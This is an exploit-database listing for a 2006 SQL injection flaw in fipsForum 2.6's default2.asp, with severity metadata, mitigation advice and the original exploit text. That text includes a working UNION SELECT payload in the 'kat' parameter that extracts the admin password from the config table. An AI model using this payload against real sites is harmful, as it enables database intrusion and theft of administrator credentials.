header-logo
Suggest Exploit
vendor:
fipsForum
by:
ajann
9
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: fipsForum
Affected Version From: 2.6
Affected Version To: 2.6
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

fipsForum <= v2.6 (default2.asp) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in fipsForum version 2.6 and earlier. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to execute arbitrary SQL commands on the underlying database.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  fipsForum <= v2.6 (default2.asp) Remote SQL Injection Vulnerability
# Author  :   ajann
# Contact :   :(

*******************************************************************************


###http://[target]/[path]//default2.asp?kat=[SQL]

Example:

//default2.asp?kat=-1%20union%20select%200,pw_admin%20from%20config


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-22]